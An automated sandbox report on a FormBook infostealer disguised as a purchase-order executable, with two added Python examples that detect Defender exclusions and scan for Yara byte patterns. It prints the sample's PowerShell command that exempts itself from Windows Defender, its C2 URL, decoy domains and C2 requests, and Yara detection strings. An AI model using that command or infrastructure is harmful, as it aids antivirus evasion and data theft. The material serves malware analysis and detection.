Analysis Report Purchase_order_397484658464974945648447564845.exe

Overview

General Information

Sample Name: Purchase_order_397484658464974945648447564845.exe
Analysis ID: 356528
MD5: 9d8635210670e8b332120a969dfa269e
SHA1: 968d4d600dd00579f6594e3b1eff98b46b422893
SHA256: 031e72b45d66c3365bfe3c7ace3c4c2a79facffa8daa7b483c77350a791c0133
Tags: exe, Formbook

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Adds a directory exclusion to Windows Defender
Binary contains a suspicious time stamp
C2 URLs / IPs found in malware configuration
Contains functionality to hide a thread from the debugger
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign process
Machine Learning detection for sample
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Purchase_order_397484658464974945648447564845.exe (PID: 6392 cmdline: 'C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe' MD5: 9D8635210670E8B332120A969DFA269E)
    • powershell.exe (PID: 6948 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 7096 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 5532 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • WerFault.exe (PID: 2576 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6392 -s 964 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup
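
The Startup tree above shows the sample (PID 6392) spawning powershell.exe to run Add-MpPreference -ExclusionPath against its own path, then cmd.exe /c timeout 1 as a short delay. The following is an added example, not part of the Joe Sandbox report: detection logic in Python run over constructed process-creation events built from that tree (pids, parents and command lines are copied from it; the explorer.exe parent and the final administrator event are invented for contrast). It flags any PowerShell command line that adds a Defender exclusion and raises the severity when the excluded path is the parent process's own image, or the parent runs from a user-writable location such as the Desktop.

```python
"""Flag Windows Defender exclusions added from a suspicious process chain.

Added example (not part of the sandbox report): detection logic run over
constructed process-creation events. The pids, parents and command lines of
events 6392..5532 are taken from the Startup tree; the explorer.exe parent
(pid 4000) and the admin event (pid 4100) are constructed for contrast.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


SAMPLE = r"C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    ProcEvent(4000, 1, r"C:\Windows\explorer.exe", "explorer.exe"),  # constructed parent
    ProcEvent(6392, 4000, SAMPLE, f"'{SAMPLE}'"),
    ProcEvent(6948, 6392, PS, f"'{PS}' Add-MpPreference -ExclusionPath '{SAMPLE}' -Force"),
    ProcEvent(6988, 6948, r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(7096, 6392, r"C:\Windows\System32\cmd.exe", r"'C:\Windows\System32\cmd.exe' /c timeout 1"),
    ProcEvent(5532, 7096, r"C:\Windows\System32\timeout.exe", "timeout 1"),
    # Constructed benign contrast: an administrator excluding a build directory from explorer.
    ProcEvent(4100, 4000, PS, f"'{PS}' Add-MpPreference -ExclusionPath 'D:\\Builds'"),
]

# Add-MpPreference / Set-MpPreference exclusion parameters; the value may be quoted either way.
EXCLUSION_RE = re.compile(
    r"-(ExclusionPath|ExclusionProcess|ExclusionExtension)\s+(?:'([^']*)'|\"([^\"]*)\"|(\S+))",
    re.IGNORECASE,
)
# Locations a standard user can write to; a parent living here is itself a red flag.
USER_WRITABLE_RE = re.compile(
    r"^[a-z]:\\users\\[^\\]+\\(desktop|downloads|appdata\\local\\temp)\\", re.IGNORECASE
)


def exclusions_in(cmdline: str) -> list:
    """Return (parameter, value) pairs for every Defender exclusion on a command line."""
    low = cmdline.lower()
    if "add-mppreference" not in low and "set-mppreference" not in low:
        return []
    return [(m.group(1), m.group(2) or m.group(3) or m.group(4))
            for m in EXCLUSION_RE.finditer(cmdline)]


def find_defender_exclusions(events) -> list:
    """One finding per exclusion. Severity is high when the excluded path is the
    parent's own image (self-exclusion) or the parent runs from a user-writable path."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        if not e.image.lower().endswith("\\powershell.exe"):
            continue
        parent = by_pid.get(e.ppid)
        for param, value in exclusions_in(e.cmdline):
            self_excl = parent is not None and value.lower() == parent.image.lower()
            user_parent = parent is not None and USER_WRITABLE_RE.match(parent.image) is not None
            findings.append({
                "pid": e.pid,
                "parent_image": parent.image if parent else None,
                "parameter": param,
                "value": value,
                "self_exclusion": self_excl,
                "parent_in_user_writable_path": user_parent,
                "severity": "high" if (self_excl or user_parent) else "medium",
            })
    return findings


if __name__ == "__main__":
    for f in find_defender_exclusions(EVENTS):
        print(f"[{f['severity']}] pid {f['pid']} parent={f['parent_image']} "
              f"-{f['parameter']} {f['value']} self_exclusion={f['self_exclusion']}")
```

On a live host the same change is visible as Event ID 5007 (configuration changed) in the Microsoft-Windows-Windows Defender/Operational log and in the ExclusionPath list returned by Get-MpPreference. Administrators do add exclusions legitimately, which is why the constructed D:\Builds event scores medium rather than high; the self-exclusion of a binary running from the Desktop is what makes the sample's chain unambiguous.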

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.aubonmarcheduparc.com/rina/"], "decoy": ["syndicauto.net", "techvorx.com", "palletrackingvancouver.com", "pricetrackerindia.com", "photocravings.com", "jenniferlwilsonrn.com", "cartucce-toner.com", "fred-auto-sport.com", "aletheajean.com", "beautyhacks.website", "seoalmaguer.com", "cursoencasa.net", "flex-eg.com", "dygdreams.com", "magnoliadawson.com", "whitehouseeffectband.com", "visualtrigger.art", "kalinahybridseeds.com", "glacesnamur.com", "drbordogna.com", "wealthtells.com", "opaoman.xyz", "ieltsjo.com", "graphicoustic.com", "jimboprivacy.com", "blockchainclood.com", "aulsgdcqg.icu", "swipeonyourself.com", "mccraft.club", "scirispartner.com", "mlinkstec.com", "allungamentopene.net", "quailridgeminischnauzers.com", "teensatoz.com", "3rud.net", "921squirecourt.com", "informaticas.net", "unicorndragonlearning.com", "duniatone.com", "abmzc023.com", "meteorproductions.com", "pinkcouturecollection.com", "dealsaction.store", "kailarosales.com", "maya-watches.com", "ladyunivers.com", "magenx2.info", "3ppschool.com", "panl.online", "intelligenten.com", "pepintre.com", "safarimadeira.info", "westglobalpartners.com", "tamilfgun.com", "upholsteredwineracks.com", "superdoctormk.club", "newfacesatv.info", "play-morepools.com", "allservice.center", "ladyandpen.com", "textileetobjet.com", "dallasgains.com", "littledeviltrainingcollar.com", "liquid-metalworks.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000C.00000002.267253843.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000C.00000002.267253843.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000002.267253843.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.293197269.00000000044EF000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000002.293197269.00000000044EF000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x86b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8a52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14765:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14251:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14867:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x149df:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x946a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x134cc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa1e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19857:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

Source | Rule | Description | Author | Strings
12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
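
The Memory Dumps and Unpacked PEs listings above give the same thirteen rule strings at different offsets, and the offsets are worth a second look: every offset in the 12.2.….unpack rows is exactly 0xE00 below its counterpart in the .raw.unpack rows and in the 0000000C…0000000000400000 memory dump, the gap expected when a first section sitting at RVA 0x1000 is written back at file offset 0x200 (an inference; the report does not show the section table). The copy found in process 0's memory at 0x44EF000 carries the same strings 0xD0 higher, consistent with the loader holding the payload before injecting it. The following is an added example, not part of the report or of either Yara rule's source: a small Python scanner that finds these strings in a constructed dump, records what the bytes disassemble to, and checks that the shift between the two layouts is constant. The report lists the strings but not each rule's condition, so the thresholds (7 of 10 for Formbook_1, all 3 for the JPCERT/CC rule), the hand disassembly in NOTES and the Formbook_JPCERT label are assumptions.

```python
"""Locate the Yara Overview byte sequences in a dump and decode what they are.

Added example (not part of the sandbox report): a minimal string scanner that
reproduces the matches listed above against a constructed dump, notes what the
bytes disassemble to, and checks that the two file-layout dumps of process 12
differ by one constant offset. Rule conditions are not shown in the report;
the thresholds in MIN_STRINGS are assumptions.
"""

# Hex strings exactly as listed in the Yara Overview (two rules, thirteen strings).
RULE_STRINGS = {
    "Formbook_1": {
        "$sequence_0": "03 C8 0F 31 2B C1 89 45 FC",
        "$sequence_1": "3C 24 0F 84 76 FF FF FF 3C 25 74 94",
        "$sequence_2": "3B 4F 14 73 95 85 C9 74 91",
        "$sequence_3": "3C 69 75 44 8B 7D 18 8B 0F",
        "$sequence_4": "5D C3 8D 50 7C 80 FA 07",
        "$sequence_5": "0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06",
        "$sequence_6": "57 89 45 FC 89 45 F4 89 45 F8",
        "$sequence_7": "66 89 0C 02 5B 8B E5 5D",
        "$sequence_8": "3C 54 74 04 3C 74 75 F4",
        "$sequence_9": "56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00",
    },
    "Formbook_JPCERT": {  # label assumed; the report names the rule "Formbook"
        "$sqlite3step": "68 34 1C 7B E1",
        "$sqlite3text": "68 38 2A 90 C5",
        "$sqlite3blob": "68 53 D8 7F 8C",
    },
}
MIN_STRINGS = {"Formbook_1": 7, "Formbook_JPCERT": 3}  # assumed rule conditions

# Hand disassembly (x86, 32-bit) of the sequences worth recognising on sight.
NOTES = {
    "$sequence_0": "add ecx,eax; rdtsc; sub eax,ecx; mov [ebp-4],eax  (RDTSC timing delta)",
    "$sequence_1": "cmp al,'$'; je rel32; cmp al,'%'; je rel8  (single-byte compares)",
    "$sequence_8": "cmp al,'T'; je +4; cmp al,'t'; jne -12  (case-insensitive compare)",
    "$sqlite3step": "push 0xE17B1C34  (32-bit immediate; the rule names it after sqlite3_step)",
}

# Offsets the report lists for the same 13 strings in the two process-12 dumps.
RAW_UNPACK = {"$sequence_0": [0x85E8, 0x8982], "$sequence_1": [0x14695], "$sequence_2": [0x14181],
              "$sequence_3": [0x14797], "$sequence_4": [0x1490F], "$sequence_5": [0x939A],
              "$sequence_6": [0x133FC], "$sequence_7": [0xA112], "$sequence_8": [0x19787],
              "$sequence_9": [0x1A82A], "$sqlite3step": [0x166B9, 0x167CC],
              "$sqlite3text": [0x166E8, 0x1680D], "$sqlite3blob": [0x166FB, 0x16823]}
UNPACK = {"$sequence_0": [0x77E8, 0x7B82], "$sequence_1": [0x13895], "$sequence_2": [0x13381],
          "$sequence_3": [0x13997], "$sequence_4": [0x13B0F], "$sequence_5": [0x859A],
          "$sequence_6": [0x125FC], "$sequence_7": [0x9312], "$sequence_8": [0x18987],
          "$sequence_9": [0x19A2A], "$sqlite3step": [0x158B9, 0x159CC],
          "$sqlite3text": [0x158E8, 0x15A0D], "$sqlite3blob": [0x158FB, 0x15A23]}


def find_all(buf: bytes, pattern: bytes) -> list:
    """Every offset of pattern in buf, including overlapping occurrences."""
    offsets, i = [], buf.find(pattern)
    while i != -1:
        offsets.append(i)
        i = buf.find(pattern, i + 1)
    return offsets


def scan(buf: bytes, rules=RULE_STRINGS, minimum=MIN_STRINGS) -> dict:
    """Per rule: offsets per string, number of strings hit, and whether the assumed condition holds."""
    report = {}
    for rule, strings in rules.items():
        hits = {name: find_all(buf, bytes.fromhex(hx)) for name, hx in strings.items()}
        matched = sum(1 for offs in hits.values() if offs)
        report[rule] = {"hits": hits, "matched_strings": matched,
                        "rule_matches": matched >= minimum[rule]}
    return report


def constant_shift(a: dict, b: dict):
    """The single value a-b shared by every offset pair, or None if the layouts differ."""
    deltas = {x - y for name in a for x, y in zip(a[name], b[name])}
    return deltas.pop() if len(deltas) == 1 else None


def build_sample_dump() -> bytes:
    """Constructed stand-in for the .raw.unpack dump: zero filler with each rule
    string written at the offsets the report lists for it."""
    buf = bytearray(0x1B000)
    for strings in RULE_STRINGS.values():
        for name, hx in strings.items():
            pat = bytes.fromhex(hx)
            for off in RAW_UNPACK[name]:
                buf[off:off + len(pat)] = pat
    return bytes(buf)


if __name__ == "__main__":
    for rule, r in scan(build_sample_dump()).items():
        print(f"{rule}: {r['matched_strings']} strings hit, rule_matches={r['rule_matches']}")
        for name, offs in r["hits"].items():
            print(f"  {name:14} {[hex(o) for o in offs]}  {NOTES.get(name, '')}")
    print("raw.unpack minus unpack offset shift:", hex(constant_shift(RAW_UNPACK, UNPACK)))
```

$sequence_0 is the RDTSC delta behind the signature "Tries to detect virtualization through RDTSC time measurements", which is why it is the one string to know by sight; the three JPCERT/CC strings are each a push of a 32-bit constant and only indicate SQLite-related code by the rule author's naming. Replace build_sample_dump() with the bytes of a real dump to reproduce the listed offsets.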

          Sigma Overview

          No Sigma rule has matched

          Signature Overview


          AV Detection:

Found malware configuration
Source: 12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.unpack | Malware Configuration Extractor: FormBook {"C2 list": ["www.aubonmarcheduparc.com/rina/"], "decoy": ["syndicauto.net", "techvorx.com", "palletrackingvancouver.com", "pricetrackerindia.com", "photocravings.com", "jenniferlwilsonrn.com", "cartucce-toner.com", "fred-auto-sport.com", "aletheajean.com", "beautyhacks.website", "seoalmaguer.com", "cursoencasa.net", "flex-eg.com", "dygdreams.com", "magnoliadawson.com", "whitehouseeffectband.com", "visualtrigger.art", "kalinahybridseeds.com", "glacesnamur.com", "drbordogna.com", "wealthtells.com", "opaoman.xyz", "ieltsjo.com", "graphicoustic.com", "jimboprivacy.com", "blockchainclood.com", "aulsgdcqg.icu", "swipeonyourself.com", "mccraft.club", "scirispartner.com", "mlinkstec.com", "allungamentopene.net", "quailridgeminischnauzers.com", "teensatoz.com", "3rud.net", "921squirecourt.com", "informaticas.net", "unicorndragonlearning.com", "duniatone.com", "abmzc023.com", "meteorproductions.com", "pinkcouturecollection.com", "dealsaction.store", "kailarosales.com", "maya-watches.com", "ladyunivers.com", "magenx2.info", "3ppschool.com", "panl.online", "intelligenten.com", "pepintre.com", "safarimadeira.info", "westglobalpartners.com", "tamilfgun.com", "upholsteredwineracks.com", "superdoctormk.club", "newfacesatv.info", "play-morepools.com", "allservice.center", "ladyandpen.com", "textileetobjet.com", "dallasgains.com", "littledeviltrainingcollar.com", "liquid-metalworks.com"]}
Multi AV Scanner detection for submitted file
Source: Purchase_order_397484658464974945648447564845.exe | Virustotal: Detection: 40%
Source: Purchase_order_397484658464974945648447564845.exe | ReversingLabs: Detection: 31%
Yara detected FormBook
Source: Yara match | File source: 0000000C.00000002.267253843.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.293197269.00000000044EF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.289325554.0000000003F69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: Purchase_order_397484658464974945648447564845.exe | Joe Sandbox ML: detected
Source: 12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen2

          Compliance:

Uses 32bit PE files
Source: Purchase_order_397484658464974945648447564845.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: Purchase_order_397484658464974945648447564845.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
          Source: Binary string: System.Core.ni.pdbRSDSD source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: System.Xml.ni.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: System.ni.pdbRSDS source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.PDB source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.281116526.0000000000F87000.00000004.00000010.sdmp
          Source: Binary string: wntdll.pdbUGP source: Purchase_order_397484658464974945648447564845.exe, 0000000C.00000002.268109455.00000000016E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Purchase_order_397484658464974945648447564845.exe, 0000000C.00000002.268109455.00000000016E0000.00000040.00000001.sdmp
          Source: Binary string: System.Configuration.ni.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: mscorlib.ni.pdbRSDS source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: jVisualBasic.pdb source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.281116526.0000000000F87000.00000004.00000010.sdmp
          Source: Binary string: System.Configuration.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: System.Xml.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: System.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.283343241.0000000001171000.00000004.00000020.sdmp
          Source: Binary string: Microsoft.VisualBasic.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: System.Core.ni.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: Purchase_order_397484658464974945648447564845.PDB source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.281116526.0000000000F87000.00000004.00000010.sdmp
          Source: Binary string: System.Windows.Forms.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb13 source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.283343241.0000000001171000.00000004.00000020.sdmp
          Source: Binary string: mscorlib.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.283343241.0000000001171000.00000004.00000020.sdmp
          Source: Binary string: System.Drawing.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: mscorlib.ni.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: System.Core.pdb source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: .pdbHh source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.281116526.0000000000F87000.00000004.00000010.sdmp
          Source: Binary string: System.Xml.ni.pdbRSDS source: WERFC3.tmp.dmp.15.dr
          Source: Binary string: System.ni.pdb source: WERFC3.tmp.dmp.15.dr
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe | Code function: 4x nop then pop edi

          Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.aubonmarcheduparc.com/rina/
Source: global traffic | HTTP traffic detected: GET /base/23DEF5FFA542BB2D1BCA37F7C5ECC686.html HTTP/1.1; Host: coroloboxorozor.com; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /base/C02C82A7124B198823DC14A0727ADA5A.html HTTP/1.1; Host: coroloboxorozor.com
Source: Joe Sandbox View | IP Address: 104.21.71.230
Source: global traffic | HTTP traffic detected: GET /base/23DEF5FFA542BB2D1BCA37F7C5ECC686.html HTTP/1.1; Host: coroloboxorozor.com; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /base/C02C82A7124B198823DC14A0727ADA5A.html HTTP/1.1; Host: coroloboxorozor.com
Source: unknown | DNS traffic detected: queries for: coroloboxorozor.com
Source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.286130454.0000000002E61000.00000004.00000001.sdmp | String found in binary or memory: http://coroloboxorozor.com
Source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.286130454.0000000002E61000.00000004.00000001.sdmp | String found in binary or memory: http://coroloboxorozor.com/base/23DEF5FFA542BB2D1BCA37F7C5ECC686.html
Source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.286130454.0000000002E61000.00000004.00000001.sdmp | String found in binary or memory: http://coroloboxorozor.com/base/C02C82A7124B198823DC14A0727ADA5A.html
Source: Purchase_order_397484658464974945648447564845.exe, 00000000.00000002.286130454.0000000002E61000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

          E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 0000000C.00000002.267253843.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.293197269.00000000044EF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.289325554.0000000003F69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

Malicious sample detected (through community Yara rule)
Source: 0000000C.00000002.267253843.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.267253843.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.293197269.00000000044EF000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.293197269.00000000044EF000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.289325554.0000000003F69000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.289325554.0000000003F69000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
